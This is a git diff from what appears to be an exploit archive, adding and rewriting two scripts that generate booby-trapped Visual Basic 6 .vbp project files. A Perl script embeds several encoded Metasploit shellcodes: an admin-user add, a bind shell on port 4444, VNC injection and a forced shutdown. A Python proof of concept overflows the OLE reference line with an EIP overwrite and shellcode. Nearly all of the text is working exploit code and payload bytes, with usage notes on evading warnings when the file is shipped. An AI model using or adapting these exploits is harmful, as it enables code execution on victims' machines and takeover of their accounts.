+	   "\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x44\x4e\x53\x4b\x38\x4e\x37".
+	   "\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x38\x4f\x54\x4a\x51\x4b\x58".
+	   "\x4f\x35\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x48".
+	   "\x41\x30\x50\x4e\x41\x53\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c".
+	   "\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
+	   "\x46\x4f\x4b\x53\x46\x55\x46\x52\x46\x30\x45\x47\x45\x4e\x4b\x48".
+	   "\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x50\x4b\x54".
+	   "\x4b\x48\x4f\x55\x4e\x51\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x58".
+ 	   "\x41\x30\x4b\x4e\x49\x38\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33".
+	   "\x42\x4c\x46\x46\x4b\x58\x42\x34\x42\x53\x45\x48\x42\x4c\x4a\x37".
+	   "\x4e\x30\x4b\x48\x42\x44\x4e\x30\x4b\x48\x42\x37\x4e\x51\x4d\x4a".
+	   "\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b".
+	   "\x42\x30\x42\x30\x42\x50\x4b\x58\x4a\x36\x4e\x53\x4f\x45\x41\x53".
+	   "\x48\x4f\x42\x36\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
+	   "\x42\x55\x4a\x56\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x46\x4a\x59".
+	   "\x50\x4f\x4c\x58\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x36\x4d\x46".
+	   "\x46\x56\x50\x42\x45\x36\x4a\x37\x45\x56\x42\x32\x4f\x52\x43\x46".
+	   "\x42\x42\x50\x56\x45\x46\x46\x47\x42\x52\x45\x47\x43\x37\x45\x36".
+	   "\x44\x57\x42\x42\x46\x53\x46\x36\x4d\x56\x49\x46\x50\x56\x42\x32".
+	   "\x4b\x36\x4f\x36\x43\x37\x4a\x46\x49\x36\x42\x32\x4f\x42\x41\x34".
+	   "\x46\x54\x46\x34\x42\x32\x48\x52\x48\x52\x42\x52\x50\x36\x45\x46".
+	   "\x46\x57\x42\x42\x4e\x56\x4f\x36\x43\x36\x41\x36\x4e\x46\x47\x56".
+	   "\x44\x37\x4f\x36\x45\x57\x42\x57\x42\x52\x41\x44\x46\x56\x4d\x56".
+	   "\x49\x46\x50\x56\x49\x46\x43\x47\x46\x57\x44\x37\x41\x36\x46\x57".
+	   "\x4f\x46\x44\x37\x43\x37\x42\x32\x46\x43\x46\x36\x4d\x56\x49\x36".
+	   "\x50\x56\x42\x42\x4f\x32\x41\x44\x46\x54\x46\x54\x42\x50\x5a";
+
+# win32_bind -  EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com
+$shellc3 = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+	   "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+	   "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+	   "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+	   "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e".
+	   "\x4d\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x38".
+	   "\x4e\x36\x46\x52\x46\x32\x4b\x38\x45\x54\x4e\x53\x4b\x48\x4e\x37".
+	   "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x41\x4b\x58".
+	   "\x4f\x45\x42\x52\x41\x50\x4b\x4e\x49\x44\x4b\x58\x46\x33\x4b\x48".
+	   "\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c".
+	   "\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e".
+	   "\x46\x4f\x4b\x33\x46\x35\x46\x32\x4a\x32\x45\x57\x45\x4e\x4b\x48".
+	   "\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x30\x4b\x54".
+	   "\x4b\x58\x4f\x35\x4e\x31\x41\x50\x4b\x4e\x43\x50\x4e\x52\x4b\x58".
+	   "\x49\x58\x4e\x46\x46\x52\x4e\x31\x41\x46\x43\x4c\x41\x33\x4b\x4d".
+	   "\x46\x46\x4b\x48\x43\x34\x42\x53\x4b\x58\x42\x54\x4e\x30\x4b\x48".
+	   "\x42\x57\x4e\x31\x4d\x4a\x4b\x48\x42\x44\x4a\x50\x50\x45\x4a\x46".
+	   "\x50\x38\x50\x34\x50\x50\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x46".
+	   "\x43\x45\x48\x56\x4a\x36\x43\x53\x44\x33\x4a\x46\x47\x57\x43\x37".
+	   "\x44\x53\x4f\x55\x46\x35\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e".
+	   "\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x45\x49\x38\x45\x4e".
+	   "\x48\x36\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x45\x4c\x36\x44\x50".
+	   "\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45".
+	   "\x4f\x4f\x48\x4d\x43\x45\x43\x45\x43\x55\x43\x55\x43\x55\x43\x54".
+	   "\x43\x45\x43\x54\x43\x45\x4f\x4f\x42\x4d\x48\x46\x4a\x36\x41\x31".
+	   "\x4e\x35\x48\x46\x43\x55\x49\x58\x41\x4e\x45\x59\x4a\x46\x46\x4a".
+	   "\x4c\x41\x42\x47\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x46\x42\x31".
+	   "\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x46\x46\x4a\x4d\x4a\x50\x32".
+	   "\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x55\x45\x55\x4f\x4f\x42\x4d".
+	   "\x4a\x56\x45\x4e\x49\x44\x48\x38\x49\x34\x47\x55\x4f\x4f\x48\x4d".
+	   "\x42\x45\x46\x45\x46\x45\x45\x35\x4f\x4f\x42\x4d\x43\x59\x4a\x36".
+	   "\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x35\x4f\x4f\x48\x4d\x45\x45".
+	   "\x4f\x4f\x42\x4d\x48\x56\x4c\x36\x46\x56\x48\x46\x4a\x36\x43\x46".
+	   "\x4d\x36\x49\x38\x45\x4e\x4c\x46\x42\x35\x49\x45\x49\x32\x4e\x4c".
+	   "\x49\x48\x47\x4e\x4c\x56\x46\x54\x49\x48\x44\x4e\x41\x43\x42\x4c".
+	   "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x54\x4e\x42".
+	   "\x43\x59\x4d\x38\x4c\x47\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x36".
+	   "\x44\x47\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x47\x46\x54\x4f\x4f".
+	   "\x48\x4d\x4b\x45\x47\x45\x44\x35\x41\x35\x41\x45\x41\x55\x4c\x46".
+	   "\x41\x30\x41\x45\x41\x45\x45\x45\x41\x45\x4f\x4f\x42\x4d\x4a\x36".
+	   "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x56".
+	   "\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x48\x47\x35\x4e\x4f".
+	   "\x43\x38\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d".
+	   "\x4a\x56\x42\x4f\x4c\x58\x46\x50\x4f\x55\x43\x45\x4f\x4f\x48\x4d".
+	   "\x4f\x4f\x42\x4d\x5a";
+
+# win32_bind_vncinject -  VNCDLL=/home/opcode/msfweb/framework/data/vncdll.dll EXITFUNC=seh AUTOVNC=1 VNCPORT=5900 LPORT=4444 Size=649 Encoder=PexAlphaNum http://metasploit.com
+$shellc4 = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+	   "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+	   "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+	   "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+	   "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4a\x4e\x48\x55\x42\x50".
+	   "\x42\x30\x42\x30\x43\x55\x45\x35\x48\x45\x47\x45\x4b\x38\x4e\x36".
+	   "\x46\x42\x4a\x31\x4b\x38\x45\x54\x4e\x33\x4b\x48\x46\x55\x45\x30".
+	   "\x4a\x47\x41\x50\x4c\x4e\x4b\x58\x4c\x54\x4a\x31\x4b\x48\x4c\x55".
+	   "\x42\x42\x41\x50\x4b\x4e\x43\x4e\x44\x43\x49\x54\x4b\x58\x46\x33".
+	   "\x4b\x48\x41\x30\x50\x4e\x41\x33\x4f\x4f\x4e\x4f\x41\x43\x42\x4c".
+	   "\x4e\x4a\x4a\x53\x42\x4e\x46\x57\x47\x30\x41\x4c\x4f\x4c\x4d\x30".
+	   "\x41\x30\x47\x4c\x4b\x4e\x44\x4f\x4b\x33\x4e\x47\x46\x42\x46\x51".
+	   "\x45\x37\x41\x4e\x4b\x38\x4c\x35\x46\x52\x41\x30\x4b\x4e\x48\x56".
+	   "\x4b\x58\x4e\x50\x4b\x54\x4b\x48\x4c\x55\x4e\x51\x41\x30\x4b\x4e".
+	   "\x4b\x58\x46\x30\x4b\x58\x41\x50\x4a\x4e\x4b\x4e\x44\x50\x41\x43".
+	   "\x42\x4c\x4f\x35\x50\x35\x4d\x35\x4b\x45\x44\x4c\x4a\x50\x42\x50".
+	   "\x50\x55\x4c\x36\x42\x33\x49\x55\x46\x46\x4b\x58\x49\x31\x4b\x38".
+	   "\x4b\x45\x4e\x50\x4b\x38\x4b\x35\x4e\x31\x4b\x48\x4b\x51\x4b\x58".
+	   "\x4b\x45\x4a\x30\x43\x55\x4a\x56\x50\x38\x50\x34\x50\x50\x4e\x4e".
+	   "\x4f\x4f\x48\x4d\x49\x48\x47\x4c\x41\x58\x4e\x4e\x42\x50\x41\x50".
+	   "\x42\x50\x42\x30\x47\x45\x48\x55\x43\x45\x49\x38\x45\x4e\x4a\x4e".
+	   "\x47\x52\x42\x30\x42\x30\x42\x30\x42\x59\x41\x50\x42\x30\x42\x50".
+	   "\x48\x4b\x49\x51\x4a\x51\x47\x4e\x46\x4a\x49\x31\x42\x47\x49\x4e".
+	   "\x45\x4e\x49\x54\x48\x58\x49\x54\x46\x4a\x4c\x51\x42\x37\x47\x4c".
+	   "\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x49\x4d\x49\x50\x45\x4f\x4d\x4a".
+	   "\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x43\x47\x45\x43\x35\x44\x33\x4f\x45".
+	   "\x43\x33\x44\x43\x42\x30\x4b\x45\x4d\x38\x4b\x34\x42\x42\x41\x55".
+	   "\x4f\x4f\x47\x4d\x49\x58\x4f\x4d\x49\x38\x43\x4c\x4d\x58\x45\x47".
+	   "\x46\x41\x4c\x36\x47\x30\x49\x45\x41\x35\x43\x45\x4f\x4f\x46\x43".
+	   "\x4f\x38\x4f\x4f\x45\x35\x46\x50\x49\x35\x49\x58\x46\x50\x50\x48".
+	   "\x44\x4e\x44\x4f\x4b\x32\x47\x52\x46\x35\x4f\x4f\x47\x43\x4f\x4f".
+	   "\x45\x35\x42\x43\x41\x53\x42\x4c\x42\x45\x42\x35\x42\x35\x42\x55".
+	   "\x42\x54\x42\x55\x42\x44\x42\x35\x4f\x4f\x45\x45\x4e\x32\x49\x48".
+	   "\x47\x4c\x41\x53\x4b\x4d\x43\x45\x43\x45\x4a\x46\x44\x30\x42\x50".
+	   "\x41\x31\x4e\x55\x49\x48\x42\x4e\x4c\x36\x42\x31\x42\x35\x47\x55".
+	   "\x4f\x4f\x45\x35\x46\x32\x43\x55\x47\x45\x4f\x4f\x45\x45\x4a\x32".
+	   "\x43\x55\x46\x35\x47\x45\x4f\x4f\x45\x55\x42\x32\x49\x48\x47\x4c".
+	   "\x41\x58\x4e\x4e\x42\x50\x42\x31\x42\x50\x42\x50\x49\x58\x43\x4e".
+	   "\x4c\x46\x42\x50\x4a\x46\x42\x30\x42\x51\x42\x30\x42\x30\x43\x35".
+	   "\x47\x45\x4f\x4f\x45\x35\x4a\x31\x41\x58\x4e\x4e\x42\x30\x46\x30".
+	   "\x42\x30\x42\x30\x4f\x4f\x43\x4d\x5a";
+
+# win32_exec -  EXITFUNC=seh CMD=shutdown -c "HAI VEn0m pwn3d j00r b0x0r wif k0sh1 u b1tch" Size=451 Encoder=PexAlphaNum http://metasploit.com
+$shellc5 = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+	   "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+	   "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+	   "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+	   "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34".
+	   "\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x54\x4e\x43\x4b\x38\x4e\x47".
+	   "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x51\x4b\x48".
+	   "\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x43\x4b\x48".
+	   "\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
+	   "\x46\x47\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e".
+	   "\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x30\x45\x37\x45\x4e\x4b\x38".
+	   "\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x34".
+	   "\x4b\x38\x4f\x45\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x31\x4b\x48".
+	   "\x41\x50\x4b\x4e\x49\x48\x4e\x35\x46\x32\x46\x50\x43\x4c\x41\x43".
+	   "\x42\x4c\x46\x56\x4b\x48\x42\x34\x42\x43\x45\x58\x42\x4c\x4a\x37".
+	   "\x4e\x50\x4b\x38\x42\x34\x4e\x50\x4b\x38\x42\x57\x4e\x51\x4d\x4a".
+	   "\x4b\x58\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x58\x42\x58\x42\x4b".
+	   "\x42\x50\x42\x30\x42\x50\x4b\x48\x4a\x46\x4e\x43\x4f\x45\x41\x53".
+	   "\x48\x4f\x42\x36\x48\x35\x49\x48\x4a\x4f\x43\x58\x42\x4c\x4b\x37".
+	   "\x42\x45\x4a\x56\x42\x4f\x4c\x48\x46\x30\x4f\x55\x4a\x56\x4a\x39".
+	   "\x50\x4f\x4c\x58\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x37\x4a\x56".
+           "\x45\x47\x46\x37\x46\x46\x4f\x36\x47\x37\x50\x46\x42\x42\x4d\x42".
+	   "\x43\x36\x42\x42\x44\x42\x4a\x34\x41\x54\x49\x34\x42\x42\x48\x35".
+	   "\x45\x34\x50\x56\x42\x33\x4d\x56\x42\x52\x42\x57\x47\x57\x50\x56".
+	   "\x43\x33\x46\x36\x42\x32\x4c\x46\x42\x33\x42\x33\x44\x37\x42\x32".
+	   "\x44\x46\x42\x53\x4a\x57\x42\x33\x44\x47\x42\x52\x47\x47\x49\x56".
+	   "\x48\x46\x42\x52\x4b\x56\x42\x33\x43\x57\x4a\x56\x41\x53\x42\x32".
+	   "\x45\x37\x42\x32\x44\x56\x41\x43\x46\x37\x43\x46\x4a\x56\x44\x32".
+	   "\x42\x30\x5a";
+
+$endQuote = "\x22";
+
+$i = $ARGV[0];
+
+
+if ($i==1){
+print "$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc1$endQuote$koshi";
+exit;
+}
+
+
+if ($i==2){
+print "$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc2$endQuote$koshi";
+exit;
+}
+
+
+if ($i==3){
+print "$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc3$endQuote$koshi";
+exit;
+}
+
+
+if ($i==4){
+print "$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc4$endQuote$koshi";
+exit;
+}
+
+
+if ($i==5){
+print "$begin0$begin1$BuffOf$codeAddr$jmpEbp$fourSkin$begin2$begin3$shellc5$endQuote$koshi";
+exit;
+}
+
+
+print "\n";
+print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
+print " +++                                                        +++\n";
+print " +++                                                        +++\n";
+print " +++ Microsoft Visual Basic 6.0 VBP_Open OLE Local CodeExec +++\n";
+print " +++ Written By Koshi                                       +++\n";
+print " +++ Greets: Rima my baby! Draven, thanks for helping.      +++\n";
+print " +++                                                        +++\n";
+print " +++ Usage Ex.: ./vb6.pl 1 >>Project1.vbp                   +++\n";
+print " +++                                                        +++\n";
+print " +++  Options:                                              +++\n";
+print " +++          1 - win32_exec CALC.EXE                       +++\n";
+print " +++          2 - win32_adduser Pass=4dmin User=koshi       +++\n";
+print " +++          3 - win32_bind Port 4444                      +++\n";
+print " +++          4 - win32_bind_vncinject Port 5900            +++\n";
+print " +++          5 - win32_exec shutdown -c \x22HAI VEn0m pw..    +++\n";
+print " +++                                                        +++\n";
+print " +++                                                        +++\n";
+print " +++ Notes: Ship final .VBP file with a .FRM file to avoid  +++\n";
+print " +++        warnings in Visual Basic 6.0                    +++\n";
+print " +++                                                        +++\n";
+print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
+
+
+
+
+
+
+exit;
+
+
+#EOF
+
+# milw0rm.com [2007-09-04]
diff --git a/platforms/windows/local/4431.py b/platforms/windows/local/4431.py
index 358dd48c8..275ce50e3 100755
--- a/platforms/windows/local/4431.py
+++ b/platforms/windows/local/4431.py
@@ -1,102 +1,102 @@
-#usage: vbexploit.py FileName.vbp
-
-import sys
-
-print "--------------------------------------------------------------------------"
-print " [PoC_2] Microsoft Visual Basic Enterprise Edition 6.0 SP6 Code Execution "
-print " author: shinnai"
-print " mail: shinnai[at]autistici[dot]org"
-print " site: http://shinnai.altervista.org\n"
-print " based on Koshi exploit"
-print " http://www.milw0rm.com/exploits/4361\n"
-print " I try his exploit on Windows XP Pro SP2 Ita, full patched and it doesn't"
-print " work, but he said:\n"
-print ' "# ...backwards..if you don' + "'t" + ' know why, then gtfo."\n'
-print " ok, now I know why brotha, I got this exception:\n"
-print ' "Access violation when writing to [63636363]"\n'
-print " so I search another way to get exploit working but I need to do some"
-print ' changes to memory address ("00" became "20") and nop ("90" became "3F").'
-print " Well, here it is a PoC_2 and if it doesn't work and" + ' "you don' + "'t know why,"
-print ' then"' + "... feel free to ask ;)\n"
-print " dedicated to all Italian vb6 programmers... be safe bros"
-print "--------------------------------------------------------------------------"
-
-buff = "A" * 494
-
-EIP = "\x37\x17\x8B\x60"; #call ESP from VBSCC.DLL esp, you can (or must) change as you like
-
-buff2 = "A" * 12
-
-RW_Memory = "\x20\x20\x01\x20" #patched writeable memory address "\x00\x00\x01\x00"
-
-nop = "\x3F\x3F\x3F\x3F" #patched nop "\x90"
-
-shellcode = \
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+\
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+\
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+\
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+\
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"+\
-"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x47"+\
-"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x41\x4b\x38"+\
-"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48"+\
-"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"+\
-"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"+\
-"\x46\x4f\x4b\x43\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58"+\
-"\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x44"+\
-"\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x38\x4e\x51\x4b\x38"+\
-"\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"+\
-"\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47"+\
-"\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x47\x4e\x41\x4d\x4a"+\
-"\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b"+\
-"\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x33"+\
-"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37"+\
-"\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x59"+\
-"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x56"+\
-"\x4e\x46\x43\x56\x50\x32\x45\x46\x4a\x37\x45\x36\x42\x50\x5a"
-
-try:
-    vb_proj = \
-        'Type=Exe\n'+\
-        'Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\WINDOWS'+\
-	'\system32\stdole2.tlb#OLE Automation' + buff + EIP + buff2 + RW_Memory + nop + shellcode + nop +\
-        '\nStartup="Sub Main"\n'+\
-        'Command32=""\n'+\
-        'Name=' + sys.argv[1]+\
-        '\nHelpContextID="0"\n'+\
-        'CompatibleMode="0"\n'+\
-        'MajorVer=1\n'+\
-        'MinorVer=0\n'+\
-        'RevisionVer=0\n'+\
-        'AutoIncrementVer=0\n'+\
-        'ServerSupportFiles=0\n'+\
-        'VersionCompanyName="xxx"\n'+\
-        'CompilationType=0\n'+\
-        'OptimizationType=0\n'+\
-        'FavorPentiumPro(tm)=0\n'+\
-        'CodeViewDebugInfo=0\n'+\
-        'NoAliasing=0\n'+\
-        'BoundsCheck=0\n'+\
-        'OverflowCheck=0\n'+\
-        'FlPointCheck=0\n'+\
-        'FDIVCheck=0\n'+\
-        'UnroundedFP=0\n'+\
-        'StartMode=0\n'+\
-        'Unattended=0\n'+\
-        'Retained=0\n'+\
-        'ThreadPerObject=0\n'+\
-        'MaxNumberOfThreads=1\n\n'+\
-        '[MS Transaction Server]\n'+\
-        'AutoRefresh=1'
-    
-    out_file = open(sys.argv[1],'w')
-    out_file.write(vb_proj)
-    out_file.close()
-    print "\nFILE CREATION COMPLETED!\n"
-except:
-    print " \n -------------------------------------"
-    print "  Usage: exploit.py FileName.vbp"
-    print " -------------------------------------"
-    print "\nAN ERROR OCCURS DURING FILE CREATION!"
-
-# milw0rm.com [2007-09-19]
+#usage: vbexploit.py FileName.vbp
+
+import sys
+
+print "--------------------------------------------------------------------------"
+print " [PoC_2] Microsoft Visual Basic Enterprise Edition 6.0 SP6 Code Execution "
+print " author: shinnai"
+print " mail: shinnai[at]autistici[dot]org"
+print " site: http://shinnai.altervista.org\n"
+print " based on Koshi exploit"
+print " http://www.milw0rm.com/exploits/4361\n"
+print " I try his exploit on Windows XP Pro SP2 Ita, full patched and it doesn't"
+print " work, but he said:\n"
+print ' "# ...backwards..if you don' + "'t" + ' know why, then gtfo."\n'
+print " ok, now I know why brotha, I got this exception:\n"
+print ' "Access violation when writing to [63636363]"\n'
+print " so I search another way to get exploit working but I need to do some"
+print ' changes to memory address ("00" became "20") and nop ("90" became "3F").'
+print " Well, here it is a PoC_2 and if it doesn't work and" + ' "you don' + "'t know why,"
+print ' then"' + "... feel free to ask ;)\n"
+print " dedicated to all Italian vb6 programmers... be safe bros"
+print "--------------------------------------------------------------------------"
+
+buff = "A" * 494
+
+EIP = "\x37\x17\x8B\x60"; #call ESP from VBSCC.DLL esp, you can (or must) change as you like
+
+buff2 = "A" * 12
+
+RW_Memory = "\x20\x20\x01\x20" #patched writeable memory address "\x00\x00\x01\x00"
+
+nop = "\x3F\x3F\x3F\x3F" #patched nop "\x90"
+
+shellcode = \
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+\
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+\
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+\
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+\
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"+\
+"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x47"+\
+"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x41\x4b\x38"+\
+"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48"+\
+"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"+\
+"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"+\
+"\x46\x4f\x4b\x43\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58"+\
+"\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x44"+\
+"\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x38\x4e\x51\x4b\x38"+\
+"\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"+\
+"\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47"+\
+"\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x47\x4e\x41\x4d\x4a"+\
+"\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b"+\
+"\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x33"+\
+"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37"+\
+"\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x59"+\
+"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x56"+\
+"\x4e\x46\x43\x56\x50\x32\x45\x46\x4a\x37\x45\x36\x42\x50\x5a"
+
+try:
+    vb_proj = \
+        'Type=Exe\n'+\
+        'Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\WINDOWS'+\
+	'\system32\stdole2.tlb#OLE Automation' + buff + EIP + buff2 + RW_Memory + nop + shellcode + nop +\
+        '\nStartup="Sub Main"\n'+\
+        'Command32=""\n'+\
+        'Name=' + sys.argv[1]+\
+        '\nHelpContextID="0"\n'+\
+        'CompatibleMode="0"\n'+\
+        'MajorVer=1\n'+\
+        'MinorVer=0\n'+\
+        'RevisionVer=0\n'+\
+        'AutoIncrementVer=0\n'+\
+        'ServerSupportFiles=0\n'+\
+        'VersionCompanyName="xxx"\n'+\
+        'CompilationType=0\n'+\
+        'OptimizationType=0\n'+\
+        'FavorPentiumPro(tm)=0\n'+\
+        'CodeViewDebugInfo=0\n'+\
+        'NoAliasing=0\n'+\
+        'BoundsCheck=0\n'+\
+        'OverflowCheck=0\n'+\
+        'FlPointCheck=0\n'+\
+        'FDIVCheck=0\n'+\
+        'UnroundedFP=0\n'+\
+        'StartMode=0\n'+\
+        'Unattended=0\n'+\
+        'Retained=0\n'+\
+        'ThreadPerObject=0\n'+\
+        'MaxNumberOfThreads=1\n\n'+\
+        '[MS Transaction Server]\n'+\
+        'AutoRefresh=1'
+    
